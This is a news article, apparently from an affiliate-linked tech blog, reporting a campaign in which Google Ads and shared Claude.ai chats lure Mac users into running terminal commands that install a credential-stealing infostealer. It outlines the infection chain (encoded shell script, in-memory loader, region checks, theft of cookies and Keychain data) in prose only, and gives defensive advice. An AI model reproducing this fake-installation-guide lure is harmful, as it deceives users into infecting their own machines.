TL;DR
Hackers are using Google Ads and malicious Claude.ai shared chats to spread Mac malware. The campaign involves convincing social engineering and polymorphic payloads, targeting Mac users who search for Claude downloads.
Cybercriminals are actively abusing Google Ads and legitimate Claude.ai shared chats to distribute malware targeting Mac users, according to recent security research. This campaign leverages trusted platforms and social engineering, making it particularly dangerous for unsuspecting users.
Security engineer Berk Albayrak of Trendyol Group first identified the campaign, revealing shared Claude.ai chats that mimic official installation guides and instruct users to run terminal commands. These chats are hosted on different domains and follow similar structures, but serve malicious payloads designed to infect Macs.
The malware delivered via these chats involves a base64-encoded shell script that downloads a polymorphic ‘loader.sh’ script, which runs entirely in memory, reducing detectability. The script checks for specific regional keyboard settings, exfiltrates system information, and then proceeds to download a second-stage payload, which can harvest browser credentials, cookies, and Keychain data. One variant identified by Albayrak appears to target users selectively based on regional settings and skips profiling, directly exfiltrating data.
Both campaigns are hosted on legitimate-looking domains, with Google Ads pointing to the real claude.ai domain. However, the malicious instructions are embedded within shared chat features, which are exploited for social engineering. Researchers confirmed that the attack infrastructure uses polymorphic techniques, making detection more difficult, and that the payloads are tailored for macOS, including the MacSync infostealer variant.
Why It Matters
This campaign underscores the evolving tactics of cybercriminals who are exploiting AI platforms and legitimate advertising channels to target Mac users. The use of shared AI chats for malware distribution bypasses traditional URL filtering and leverages the trust users place in familiar platforms. The malware’s ability to run entirely in memory and exfiltrate sensitive data poses significant security risks, especially as Mac malware becomes more sophisticated.
Mac Mini Logic Board Removal Tool (2010-2018 Models)
High strength quality, metal construction
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Background
Malvertising campaigns have a long history of delivering malware through fake or compromised ads, but recent efforts have increasingly targeted AI platforms like ChatGPT and now Claude.ai. In December, similar attacks exploited shared chat features for malware delivery. This campaign is notable for using genuine Google Ads linking to authentic Claude.ai domains, with malicious instructions embedded within shared chats, complicating detection efforts.
Security researchers have observed multiple variants employing polymorphic payloads and region-based checks, indicating a targeted approach. The campaign highlights the importance of cautious behavior when following terminal commands from unverified sources, even within trusted AI chat environments.
“The shared Claude.ai chats are being weaponized with social engineering to trick users into running malicious commands that silently infect their Macs.”
— Berk Albayrak, security engineer at Trendyol Group
“The malware employs polymorphic techniques and region-based checks to evade detection and target specific users, exfiltrating sensitive data without alerting the victim.”
— BleepingComputer
McAfee Total Protection 5-Device | AntiVirus Software 2026 for Windows PC & Mac, AI Scam Detection, VPN, Password Manager, Identity Monitoring | 1-Year Subscription with Auto-Renewal | Download
DEVICE SECURITY – Award-winning McAfee antivirus, real-time threat protection, protects your data, phones, laptops, and tablets
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What Remains Unclear
It remains unclear how widespread this campaign is, whether other platforms are being exploited similarly, and if additional variants of the malware exist. The full scope of the infrastructure and the operators behind the campaign are still under investigation. Additionally, the effectiveness of current detection and mitigation measures against these specific payloads is not yet fully known.
The Art of Mac Malware, Volume 2: Detecting Malicious Software
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What’s Next
Security researchers and platform providers are expected to continue monitoring the campaign, with potential updates on the scope and scale. Users are advised to avoid clicking on suspicious ads and terminal commands from untrusted sources. Further technical analysis may reveal additional variants or infrastructure used by the attackers. Companies like Google and Anthropic are likely to implement additional safeguards to prevent such abuse.
![Malwarebytes Premium | Amazon Exclusive | 18 Months, 2 Devices | Windows, Mac OS, Android, Apple iOS, Chrome [Online Code]](https://m.media-amazon.com/images/I/41ogWORIjAL._SL500_.jpg)
Malwarebytes Premium | Amazon Exclusive | 18 Months, 2 Devices | Windows, Mac OS, Android, Apple iOS, Chrome [Online Code]
AWARD WINNING Antivirus, anti-malware, anti-spyware & more
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Key Questions
How can I protect my Mac from this malware?
Always verify the source before running terminal commands, avoid clicking on suspicious ads, and only download software from official sources. Keep your system and security software up to date.
Are Google Ads involved in this campaign?
Yes, attackers are abusing Google Ads to direct users to malicious shared chats on Claude.ai, making the campaign more convincing and harder to detect.
Can this malware infect other operating systems?
Currently, the malware targets macOS specifically. There is no confirmed evidence of similar campaigns targeting Windows or Linux systems, but threat actors may adapt their tactics.
What should I do if I suspect I’ve been infected?
Run a full system scan with reputable security software, disconnect from the internet, and seek professional assistance if needed. Avoid running unknown terminal commands in the future.
